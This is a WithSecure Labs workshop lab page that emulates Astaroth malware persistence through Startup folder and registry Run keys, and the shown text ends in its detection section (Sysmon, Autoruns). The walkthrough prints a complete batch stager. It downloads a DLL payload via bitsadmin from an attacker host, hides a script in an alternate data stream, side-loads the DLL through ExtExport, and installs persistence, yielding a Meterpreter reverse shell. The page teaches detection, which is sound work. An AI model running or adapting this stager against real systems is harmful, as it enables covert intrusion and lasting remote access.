{"id":10579,"date":"2020-07-03T09:00:00","date_gmt":"2020-07-03T08:00:00","guid":{"rendered":"https:\/\/www.withsecure.com\/resources-hub\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-2\/"},"modified":"2026-05-25T10:34:16","modified_gmt":"2026-05-25T09:34:16","slug":"attack-detection-fundamentals-code-execution-and-persistence-lab-2","status":"publish","type":"lab_item","link":"https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-2\/","title":{"rendered":"Attack Detection Fundamentals: Code Execution and Persistence &#8211; Lab #2"},"content":{"rendered":"<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 wp-block-one-column-block--meta-sharing layout--spacing-xxxxl-top layout--spacing-xl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                            <div class='wp-block-one-column-block__meta-sharing-grid'><div class=\"wp-component-content wp-component-content--default wp-block-one-column-block__content fade-in\">\n            <h1 class=\"wp-component-heading text--h2 wp-component-content__title\">\n    Attack Detection Fundamentals: Code Execution and Persistence &#8211; <span class=\"blue-text\">Lab #2<\/span><\/h1>                    <div class=\"wp-component-content__inner\">\n                                                    <div class=\"wp-component-content__meta\">\n                                                                            <span class=\"wp-component-content__meta-categories\">\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Attack Detection                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Software Protection                                    <\/span>\n                                                                    <span class=\"wp-component-content__meta-category\">\n                                        Threat intelligence                                    <\/span>\n                                                            <\/span>\n                                                                                                    <span class=\"wp-component-content__meta-date\">\n                                03 7\u6708, 2020                            <\/span>\n                                                                    <\/div>\n                                            <\/div>\n                <\/div><section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--content-1 wp-block-sharing-icons--disable-container wp-block-one-column-block__sharing fade-in wp-block-one-column-block__sharing fade-in\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    \u30b7\u30a7\u30a2\u3059\u308b                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-2\/&#038;title=Attack%20Detection%20Fundamentals:%20Code%20Execution%20and%20Persistence%20&#8211;%20Lab%20#2\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Linkedin\u3067\u5171\u6709\u3059\u308b\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Code Execution and Persistence &#8211; Lab #2&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-2\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"\u30c4\u30a4\u30c3\u30bf\u30fc\u3067\u5171\u6709\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n<\/div>                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-one-column-block edwp-block js-wp-block-one-column-block wp-block-one-column-block--content-1 layout--spacing-xxxl-bottom\"\n    >\n    <div class=\"wp-block-one-column-block__container\">\n                                                                                                                                    <div class=\"wp-component-image__wrapper wp-block-one-column-block__image fade-in\">\n                    <figure class=\"wp-component-image__figure\">\n                                            <img loading=\"lazy\" decoding=\"async\" width=\"1200\" height=\"800\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp\" class=\"wp-component-image\n                            wp-component-image--desktop\n                            wp-component-image--mobile\n                            wp-component-image--ratio-content-25-1 wp-component-image--fit-cover\" alt=\"\" srcset=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research.jpg.webp 1200w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-300x200.jpg.webp 300w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-1024x683.jpg.webp 1024w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-768x512.jpg.webp 768w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-447x298.jpg.webp 447w, https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/ws_labs_research-219x146.jpg.webp 219w\" sizes=\"auto, (max-width: 1200px) 100vw, 1200px\" \/>                                                    <\/figure>\n                    <\/div>\n                                                                                <\/div>\n<\/section>\n\n\n<section\n    class=\"wp-block-two-column-block edwp-block js-wp-block-two-column-block wp-block-two-column-block--content-1 wp-block-two-column-block__left--align-y-top wp-block-two-column-block__right--align-y-top wp-block-two-column-block--split-sidebar layout--none-top layout--spacing-xxxl-bottom\"\n    data-block-id=\"block_79f9b4371826010233bbb5dec538d8f6\"\n    >\n    <div class=\"wp-block-two-column-block__container row-load\">\n                                                        <div class=\"wp-block-two-column-block__left\">\n                                    <div class=\"wp-component-authors-list wp-block-two-column-block__authors\">\n                    <p class=\"wp-component-authors-list__title\">\n                Authors            <\/p>\n        \n        <div class=\"wp-component-authors-list__items\">\n                                                <div class=\"wp-component-author-card \">\n    <div class=\"wp-component-author-card__media\">\n                    <span class=\"wp-component-author-card__photo-placeholder\" aria-hidden=\"true\">\n                <svg viewBox=\"0 0 64 64\" role=\"presentation\" focusable=\"false\">\n                    <path d=\"M32 34c-8.1 0-14.7 6.6-14.7 14.7v3.5h29.4v-3.5C46.7 40.6 40.1 34 32 34z\"><\/path>\n                    <path d=\"M32 31.2c6 0 10.9-4.9 10.9-10.9S38 9.4 32 9.4s-10.9 4.9-10.9 10.9S26 31.2 32 31.2z\"><\/path>\n                <\/svg>\n            <\/span>\n            <\/div>\n    <div class=\"wp-component-author-card__content\">\n                    <h3 class=\"wp-component-author-card__name\">Anartz Martin<\/h3>\n        \n                \n            <\/div>\n\n<\/div>\n\n                                    <\/div>\n\n            <\/div>\n<nav\n    class=\"wp-component-content-navigation wp-block-two-column-block__content-nav js-content-navigation\"\n    data-bem-base=\"wp-component-content-navigation\"\n    data-nav-column=\"left\"\n    data-nav-type=\"auto\"\n>\n            <p class=\"wp-component-content-navigation__title\">\n            Content        <\/p>\n    \n    <div class=\"wp-component-content-navigation__mobile\">\n        <label class=\"wp-component-content-navigation__mobile-label\">\n            <span class=\"wp-component-content-navigation__mobile-label-text\">\n                \u30b3\u30f3\u30c6\u30f3\u30c4\u30ca\u30d3\u30b2\u30fc\u30b7\u30e7\u30f3            <\/span>\n            <select class=\"wp-component-content-navigation__select js-content-navigation-select\">\n                <option value=\"\">\n                    \u30bb\u30af\u30b7\u30e7\u30f3\u3092\u9078\u629e                <\/option>\n                            <\/select>\n        <\/label>\n    <\/div>\n\n    <div class=\"wp-component-content-navigation__desktop\">\n        <div class=\"wp-component-content-navigation__list-wrapper\">\n            <span\n                class=\"wp-component-content-navigation__indicator js-content-navigation-indicator\"\n                aria-hidden=\"true\"\n            ><\/span>\n            <ul class=\"wp-component-content-navigation__list js-content-navigation-list\">\n                            <\/ul>\n        <\/div>\n    <\/div>\n<\/nav>\n<section\n    class=\"wp-block-sharing-icons edwp-block wp-block-sharing-icons--disable-border wp-block-sharing-icons--disable-container wp-block-two-column-block__share wp-block-two-column-block__hide-mobile wp-block-two-column-block__share wp-block-two-column-block__hide-mobile\"\n    >\n    <div class=\"wp-block-sharing-icons__container\">\n        <div class=\"wp-block-sharing-icons__inner\">\n                            <p class=\"wp-block-sharing-icons__title fade-in\">\n                    Share this story                <\/p>\n                        <div class=\"wp-component-socials wp-component-socials--dark-mode\">\n    \n            <a href=\"https:\/\/www.linkedin.com\/shareArticle?mini=true&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-2\/&#038;title=Attack%20Detection%20Fundamentals:%20Code%20Execution%20and%20Persistence%20&#8211;%20Lab%20#2\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link\" title=\"Linkedin\u3067\u5171\u6709\u3059\u308b\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#linkedin'><\/use>\n            <\/svg>        <\/a>\n    \n            <a href=\"http:\/\/x.com\/share?text=Attack Detection Fundamentals: Code Execution and Persistence &#8211; Lab #2&#038;url=https:\/\/www.withsecure.com\/jp-ja\/resources-hub\/w-labs\/attack-detection-fundamentals-code-execution-and-persistence-lab-2\/\" target=\"_blank\" rel=\"noreferer noopener\" class=\"wp-component-socials__link wp-component-socials__link--twitter\" title=\"\u30c4\u30a4\u30c3\u30bf\u30fc\u3067\u5171\u6709\">\n            <svg class='edwp-icon edwp-icon--xlg js-icon ' aria-hidden='true'>\n                <use xlink:href='#x'><\/use>\n            <\/svg>        <\/a>\n    \n    \n    <\/div>\n        <\/div>\n    <\/div>\n<\/section>\n                <\/div>\n                                                <div class=\"wp-block-two-column-block__right\">\n                                <div class=\"wp-component-paragraph wp-block-two-column-block__paragraph \">\n    <p>In the second part of WithSecure Consulting&#x27;s Attack Detection Workshop series, covering Code Execution and Persistence, we explored a number of offensive techniques for achieving code execution and maintaining a foothold within a target environment.<\/p>\n<p>We emulated the TTPs used by Astaroth malware to do this, and saw how living-off-the-land binaries (LOLBins), DLL side-loading and alternate data streams could be put to use by threat actors. In the second lab, we adapted our malware to include two persistence techniques. We also explored the detection strategies that can be employed to spot these using our own detection stacks. The following blog provides a final step-by-step guide to recreating the demos from that Code Execution and Persistence workshop, as well as exercises to further the reader&#x27;s understanding of the concepts shown.<\/p>\n<p>A recording of the workshop can be found <a href=\"https:\/\/youtu.be\/C0M4BHa1Gv4\" target=\"_blank\" rel=\"noopener\">here<\/a>.<\/p>\n<p>In this final lab, we are going to deal with Persistence, again grabbing inspiration from TTPs the real-world threat Astaroth used in its latest campaign. Contrasting with some of the more esoteric techniques we saw in the previous lab, the actor chose two more traditional and straightforward techniques for maintaining their foothold. We are going to reuse the lab setup and most of the resources we developed in the <a href=\"https:\/\/labs.withsecure.com\/blog\/attack-detection-fundamentals-code-execution-and-persistence-lab-1\/\" target=\"_blank\" rel=\"noopener\">first<\/a> lab, so it is encouraged that the reader get familiar with the previous lab if they have not yet do so. Again, we are going to take a simplified approach to the real techniques the Astaroth malware campaign used earlier this year, so I also recommend taking a look at Microsoft Defender ATP Research Team&#x27;s blog <a href=\"https:\/\/www.microsoft.com\/security\/blog\/2020\/03\/23\/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable\/\" target=\"_blank\" rel=\"noopener\">post<\/a> to get a better picture of how the attack works.<\/p>\n<p>As in the real incidents we have dealt with, we are going to use two techniques that add code to the start process by modifying the registry run keys and start up folder.<\/p>\n<h2>Registry Run Keys and Startup Folder<\/h2>\n<p>As mentioned in the introduction, the actors behind the Astaroth campaign decided to go with a more old school, tried and tested approach for their attempt at persistence than the rare code execution techniques we examined in the first lab. I guess they went with the old mantra: &quot;If something works, why change it?&quot;. Even if these techniques are not as comparatively stealthy as other approaches, they are still reliable and efficient in what they do. Furthermore, for the purposes of our workshop, they adequately demonstrate some detection strategies that will further the reader&#x27;s understanding and are easy to implement.<\/p>\n<h3>Startup Folder<\/h3>\n<p>One means of persistence is to create a file in the user&#x27;s &quot;Start Up&quot; folder. As the name might suggest, the special thing about this folder, is that everything that is in it gets executed at start up, as long as it is in an executable format.<\/p>\n<p>The path of this folder is as follows:<\/p>\n<pre><code class=\"language-bash\">C:\\Users\\&lt;username&gt;\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\<\/code><\/pre>\n<p>It is important to note here that anything that gets executed this way will be under the context of the user logging in.<\/p>\n<p>Notably, if we have administrative privileges, we could instead use the system-wide StartUp folder, located in:<\/p>\n<pre><code class=\"language-bash\">C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup<\/code><\/pre>\n<p>This way our payload would load any time a user logs into the system, no matter who they are (although, the file would still be executed under that user&#x27;s privileges).<\/p>\n<h3>Registry Run Keys<\/h3>\n<p>By adding an entry to certain locations inside the Windows Registry (known as &quot;Run Keys&quot;) an attacker is able to get code executed every time the system boots up or that the user logs in. As with the &quot;Start Up&quot; folders described above, here we also have user-specific locations and system wide locations (that also require administrative privileges to be modified).<\/p>\n<h3>HKEY_CURRENT_USER (HKCU)<\/h3>\n<p>Entries added to the Run Keys in the Current User Registry Hive (HKCU) will get executed every time the compromised user logs in.<\/p>\n<p>The following list shows the most common locations to achieve persistence under the context of the current user.<\/p>\n<pre><code class=\"language-bash\">HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce<\/code><\/pre>\n<p>We can modify one such location and add a key to get our code executed every time the user logs in with the following command:<\/p>\n<pre><code class=\"language-bash\">REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v &lt;name&gt; \/t REG_SZ \/d &lt;filepath&gt;<\/code><\/pre>\n<h3>HKEY_LOCAL_MACHINE (HKLM)<\/h3>\n<p>On the other hand, entries added to the Run Keys in the System or Local Machine Registry Hive (HKCU) will get executed every time any user logs in into the system.<\/p>\n<pre><code class=\"language-bash\">HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\nHKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce<\/code><\/pre>\n<p>And the command to modify one of these registries, and add our system wide persistence key, is as follows (remember we do need administrative privileges to tinker with this):<\/p>\n<pre><code class=\"language-bash\">REG ADD HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run \/v &lt;name&gt; \/t REG_SZ \/d &lt;filepath&gt;<\/code><\/pre>\n<p>Additionally, there are a few other registry locations that can be used to create and place start up folder items that will of course also get executed at log in:<\/p>\n<pre><code class=\"language-bash\">HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders\nHKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders<\/code><\/pre>\n<p>In fact, this is actually the case with the Astaroth malware. The attackers added an entry to the registry listed below to achieve persistence, and we will do the same in our lab.<\/p>\n<pre><code class=\"language-bash\">HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders<\/code><\/pre>\n<p>Finally, there are still more locations and methods to achieve persistence using this technique, so I recommend doing some more research on the topic to get a more thorough view on this.<\/p>\n<h2>References<\/h2>\n<ul>\n<li><a href=\"https:\/\/www.microsoft.com\/security\/blog\/2020\/03\/23\/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable\/\" target=\"_blank\" rel=\"noopener\">Microsoft Defender ATP Astaroth<\/a><\/li>\n<li><a href=\"https:\/\/www.fuzzysecurity.com\/tutorials\/19.html\" target=\"_blank\" rel=\"noopener\">Fuzzy Security &#8211; Windows Userland Persistence Fundamentals<\/a><\/li>\n<li><a href=\"https:\/\/azeria-labs.com\/persistence\/\" target=\"_blank\" rel=\"noopener\">Azeria Labs &#8211; Persistence<\/a><\/li>\n<li><a href=\"https:\/\/docs.microsoft.com\/en-gb\/windows\/win32\/setupapi\/run-and-runonce-registry-keys?redirectedfrom=MSDN\" target=\"_blank\" rel=\"noopener\">Windows &#8211; Run and RunOnce Registry Keys<\/a><\/li>\n<li><a href=\"https:\/\/docs.microsoft.com\/en-us\/windows-server\/administration\/windows-commands\/reg\" target=\"_blank\" rel=\"noopener\">Windows &#8211; Reg Command<\/a><\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/tactics\/TA0003\/\" target=\"_blank\" rel=\"noopener\">MITRE ATT&amp;amp;CK &#8211; Persistence<\/a><\/li>\n<li><a href=\"https:\/\/attack.mitre.org\/techniques\/T1060\/\" target=\"_blank\" rel=\"noopener\">MITRE ATT&amp;amp;CK &#8211; Registry Run Keys \/ Startup Folder<\/a><\/li>\n<li><a href=\"https:\/\/www.offensive-security.com\/metasploit-unleashed\/\" target=\"_blank\" rel=\"noopener\">Offensive Security &#8211; Metasploit Unleashed<\/a><\/li>\n<li><a href=\"https:\/\/github.com\/Neo23x0\/sigma\" target=\"_blank\" rel=\"noopener\">Sigma Rules<\/a><\/li>\n<\/ul>\n<h2>Required Tools<\/h2>\n<ul>\n<li>Attacking VM <a href=\"https:\/\/www.kali.org\/\" target=\"_blank\" rel=\"noopener\">Kali Linux<\/a><\/li>\n<li>Target VM (Windows with AV and Firewall disabled)<\/li>\n<li>SimpleHTTPServer (Python module)<\/li>\n<li><a href=\"https:\/\/www.metasploit.com\/\" target=\"_blank\" rel=\"noopener\">Metasploit<\/a><\/li>\n<li>Windows Registry Editor (Regedit)<\/li>\n<li><a href=\"https:\/\/docs.microsoft.com\/en-gb\/sysinternals\/downloads\/autoruns\" target=\"_blank\" rel=\"noopener\">Autoruns<\/a><\/li>\n<\/ul>\n<h2>Walkthrough<\/h2>\n<p>All the steps to create the payloads and set up the C2 server remain the same as in the previous lab. The only changes we need to make to carry out this new version of the simulation &#8211; with persistence included &#8211; is to add the persistence mechanisms to the stager payload.<\/p>\n<h3>Stager Creation (With Persistence)<\/h3>\n<p>To achieve persistence we are going to add two new lines of code to this stager file.<\/p>\n<h3>Add the Payload to the User&#x27;s Start Up Folder<\/h3>\n<p>The first line will add a copy of our launcher payload to the user&#x27;s Start Up folder.<\/p>\n<pre><code class=\"language-bash\">copy &lt;filepath&gt; &quot;C:\\Users\\&lt;username&gt;\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\&lt;filename&gt;&quot;<\/code><\/pre>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/startup-launcher.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h3>Run Keys in the User Registry Hive<\/h3>\n<p>The second line of code is going to create a registry key pointing to our payload location inside the user&#x27;s Registry Hive.<\/p>\n<pre><code class=\"language-bash\">REG ADD &quot;HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders&quot; \/f \/v StartUp \/t REG_SZ \/d &lt;filepath&gt;<\/code><\/pre>\n<p>The flags used on this command mean the following:<\/p>\n<ul>\n<li>\/f &#8211; Adds the registry entry without prompting for confirmation.<\/li>\n<li>\/v &#8211; Specifies the name of the registry entry.<\/li>\n<li>\/t &#8211; Specifies the type for the registry entry.<\/li>\n<li>\/d &#8211; Specifies the data for the new registry entry.<\/li>\n<\/ul>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/reg-add.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<h3>Stager v2.0 Code<\/h3>\n<p>You can find the complete code for the new stager below.<\/p>\n<pre><code class=\"language-bash\">@echo off\n\nsetlocal enabledelayedexpansion\n\nset SERVER=http:\/\/192.168.40.128\/\n\nset PATH_PUBLIC_DIR=C:\\Users\\Public\\Libraries\\raw\\\nrem Create the target directoty if it does not exist.\nif not exist &quot;%PATH_PUBLIC_DIR%&quot; mkdir %PATH_PUBLIC_DIR%\n\nset PAYLOAD_DLL=payload.dll\nset TARGET_ADS=desktop.ini\nset LAUNCHER_LNK=launcher.lnk\nset LAUNCHER_CREATE_VBS=launcher_create.vbs\n\nset URL_PAYLOAD_DLL=%SERVER%%PAYLOAD_DLL%\n\nrem ExtExport.exe looks for any DLL with the following names.\nset EXTEXPORT_DLLS[1]=mozcrt19.dll\nset EXTEXPORT_DLLS[2]=mozsqlite3.dll\nset EXTEXPORT_DLLS[3]=sqlite3.dll\n\nrem Select one DLL filename at random.\nset \/a _rand=%RANDOM% %% 3 + 1\nset EXTEXPORT_DLL=!EXTEXPORT_DLLS[%_rand%]!\n\nset PATH_EXTEXPORT_DLL=%PATH_PUBLIC_DIR%%EXTEXPORT_DLL%\nset PATH_LAUNCHER_LNK=%PATH_PUBLIC_DIR%%LAUNCHER_LNK%\nset PATH_LAUNCHER_CREATE_VBS=%PATH_PUBLIC_DIR%%LAUNCHER_CREATE_VBS%\n\nset PATH_LAUNCHER_CREATE_ADS=%PATH_PUBLIC_DIR%%TARGET_ADS%:%LAUNCHER_CREATE_VBS%\n\nset PATH_EXTEXPORT_EXE=C:\\Program Files (x86)\\Internet Explorer\\Extexport.exe\nset EXTEXPORT_ARGS=C:\\Users\\Public\\Libraries\\raw foo bar\n\nrem Download the renamed DLL payload from the server.\nbitsadmin \/transfer 2 \/priority FOREGROUND %URL_PAYLOAD_DLL% %PATH_EXTEXPORT_DLL%\n\nrem Use a temporary VBScript to create the LNK launcher.\nrem The launcher will take the renamed DLL payload and load it using ExtExport.\necho Set oWS = WScript.CreateObject(&quot;WScript.Shell&quot;) &gt; %PATH_LAUNCHER_CREATE_VBS%\necho sLinkFile = &quot;%PATH_LAUNCHER_LNK%&quot; &gt;&gt; %PATH_LAUNCHER_CREATE_VBS%\necho Set oLink = oWS.CreateShortcut(sLinkFile) &gt;&gt; %PATH_LAUNCHER_CREATE_VBS%\necho oLink.TargetPath = &quot;%PATH_EXTEXPORT_EXE%&quot; &gt;&gt; %PATH_LAUNCHER_CREATE_VBS%\necho oLink.Arguments = &quot;%EXTEXPORT_ARGS%&quot; &gt;&gt; %PATH_LAUNCHER_CREATE_VBS%\necho oLink.Save &gt;&gt; %PATH_LAUNCHER_CREATE_VBS%\n\nrem Copy the launcher creation VBScript to the Alternate Data Stream (ADS) of desktop.ini and erase it.\ntype %PATH_LAUNCHER_CREATE_VBS% &gt; %PATH_LAUNCHER_CREATE_ADS% &amp;&amp; erase %PATH_LAUNCHER_CREATE_VBS%\n\nrem Execute the launcher creation VBScript from the Alternate Data Stream (ADS).\ncscript %PATH_LAUNCHER_CREATE_ADS%\n\nrem #############################################################################\n\nrem Persistence Code Added Here\nrem ---------------------------\n\nrem Copy the Launcher to the user&#x27;s startup folder.\ncopy %PATH_LAUNCHER_LNK% &quot;C:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\%LAUNCHER_LNK%&quot;\n\nrem Add a registry key to the run keys in the user registry hive.\nREG ADD &quot;HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders&quot; \/f \/v StartUp \/t REG_SZ \/d %PATH_LAUNCHER_LNK%\n\nrem ###########################################################################\n\nrem Execute the LNK launcher. This will use ExtExport.exe to side load and execute the DLL payload.\nstart \/b %PATH_LAUNCHER_LNK%<\/code><\/pre>\n<p>This file will work in the same way as before, with the added benefit that now it is also going to provide us with access to the target machine between reboots.<\/p>\n<h3>Executing the Attack<\/h3>\n<figure><img decoding=\"async\" src=\"https:\/\/www.withsecure.com\/wp-content\/smush-webp\/2026\/05\/persistence-flow-dark.png.webp\" alt=\"\" class=\"wp-component-image\" \/><\/figure>\n<p>The steps to carry out the attacks are the same as in the first lab, but now we will also reboot our target machine and restart our listener to test for persistence.<\/p>\n<p>These steps are recreated below:<\/p>\n<ul>\n<li>The first step is to move the <code>create_dropper_lnk.bat<\/code> batch file to the Windows VM (Desktop works) that will act as the target and execute it. This will create a shortcut file named &quot;clickme.lnk&quot; that will imitate the Infection Vector in the real attack.<\/li>\n<li>On the attacking machine, move to the directory where the payloads are stored and set up a HTTP server as described above.<\/li>\n<li>Open up a Metasploit console and set up a listener for a reverse Meterpreter shell over TCP, again following the steps already outlined.<\/li>\n<li>Back to the target machine, it is time for the user to click on that completely benign looking file. This will trigger the whole attack chain.<\/li>\n<li>Turns out the &quot;clickme&quot; shortcut file is a dropper! Who would have though. Anyway, after executing, this binary uses BITSAdmin to fetch the next step of the attack chain, a stager batch file. This stager gets automatically executed and performs two actions:<\/li>\n<li>First it reaches back to our C2 server, retrieves our DLL payload, renames it and stores it in &quot;C:\\Users\\Public\\Libraries\\raw\\&quot;.<\/li>\n<li>Second, it generates a VBS script and copies it to the Alternate Data Stream of &quot;desktop.ini&quot; inside the same directory, hiding it from unwanted eyes. The original script is immediately deleted.<\/li>\n<li>This now hidden script is accessed and executed by the stager, creating the final launcher file in shortcut format (.lnk).<\/li>\n<li>Almost there. On its final step, the stager executes the shortcut file, which launches ExtExport.exe &#8211; a LOLBin bundled in Internet Explorer &#8211; pointing to the directory where the aptly renamed DLL payload is stored. If successful, the DLL is side-loaded and the embedded payload executed.<\/li>\n<li>Voila! A Meterpreter shell spawns in the terminal of our attacking machine. Good job! Now let&#x27;s test for persistence.<\/li>\n<li>First navigate to the user Start Up folder C:\\Users\\%USERNAME%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\` and check that a copy of our launcher has successfully been copied there.<\/li>\n<li>Now let&#x27;s make use of an internal Windows tool called Regedit to check if the key has been added to the Registry too. Open the search bad in the taskbar and type <code>regedit<\/code>. You need to run this with administrative rights. Once inside Regedit&#x27;s interface, navigate to <code>HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders<\/code>. Check the value on right hand side of the key named &quot;startup&quot;. If the stager script was successful, this should now contain the path to our payload.<\/li>\n<li>Time for the final test: Shut down your target Windows VM. Your Meterpreter shell should die shortly afterwards.<\/li>\n<li>Restart the listener on the Metasploit console in our C2 machine.<\/li>\n<li>Reboot the target Windows VM and login as the same user.<\/li>\n<li>Back in your attacking VM you should now see a shiny new Meterpreter shell coming up. Victory! Persistence has been achieved! Now sit back and get ready to #HackTheWorld.<\/li>\n<\/ul>\n<h2>Detection<\/h2>\n<p>We are now aware of how the attackers behind the Astaroth campaign achieved their persistence. So the question is, how do we detect them?<\/p>\n<p>The following section describes some of the ways in which the abuse of the techniques we just discussed can be detected, with a few insights into some of the implementations Countercept used when facing with this threat.<\/p>\n<p>Most of the tools we are going to use to this end can be categorised as one of the following types:<\/p>\n<ul>\n<li>Event Logs<\/li>\n<li>Stand Alone Tools and Scripts<\/li>\n<li>Sigma Rules<\/li>\n<\/ul>\n<p>Apart from the event logs, to follow along with some of the examples we recommend installing the following tools:<\/p>\n<ul>\n<li><a href=\"https:\/\/github.com\/Neo23x0\/sigma#sigmac\" target=\"_blank\" rel=\"noopener\">Sigma &#8211; Sigmac<\/a><\/li>\n<li><a href=\"https:\/\/docs.microsoft.com\/en-us\/sysinternals\/downloads\/sysmon\" target=\"_blank\" rel=\"noopener\">Sysmon<\/a> (SwiftOnSecurity&#x27;s <a href=\"https:\/\/github.com\/SwiftOnSecurity\/sysmon-config\" target=\"_blank\" rel=\"noopener\">config<\/a> will serve us well here)<\/li>\n<li><a href=\"https:\/\/docs.microsoft.com\/en-gb\/sysinternals\/downloads\/autoruns\" target=\"_blank\" rel=\"noopener\">Sysinternal&amp;#x27;s Autoruns<\/a><\/li>\n<\/ul>\n<h3>Sysinternals Autoruns<\/h3>\n<p>The Autoruns utility from the Sysinternals suite is probably the easiest way to monitor any startup location susceptible of being abused to achieve persistence by an attacker. The tool looks into all the startup locations in the system and shows every program or executable that is configured to run during system bootup or user log in. This includes of course the StartUp folder and the registries we have been talking about through this guide.<\/p>\n<p>Not only that but it also checks for files that are configured to run when other built-in Windows applications are launched, like Explorer, Internet Explorer or media players, which can also be abused by attackers to make them execute extraneous code.<\/p>\n<p>Finally, the tool offers a wide arrange of options to filter and zoom in on any suspicious file or group of files to get a closer look into any anomalies in the startup process.<\/p>\n<p>Although the advanced usage of this tool goes beyond the scope of this guide, Autoruns should be one of the assets in any system administrator or blue teamer&#x27;s toolset.<\/p>\n<h3>Startup File Detection<\/h3>\n<p>Focusing on specific detections, persistence by the method of creating a file in the startup folder can be carried out in the following manner.<\/p>\n<p>If we have Sysmon installed as part of our detection stack, we can look for records of events in the Startup folder directory with the EID 12 (file creation), that would point to a new file being added on this location.<\/p>\n<p>We can then filter down these events by checking other data like the actual name of the process that created the file and the extension of the file itself, comparing them to a list of usual suspects to get a better context on the file creation process.<\/p>\n<p>Finally, all of this could then be implemented in a rule in whatever format we use and feed it to our SIEM to start monitoring for these occurrences.<\/p>\n<h3>Registry Run Keys Detection<\/h3>\n<p>When it comes to monitoring persistence techniques that rely on modifying Registry Keys, the process is not very different from what has been outlined above.<\/p>\n<p>Sysmon events with an EID 12 point to actions that have modified an entry in the registry. If we ingest these records, 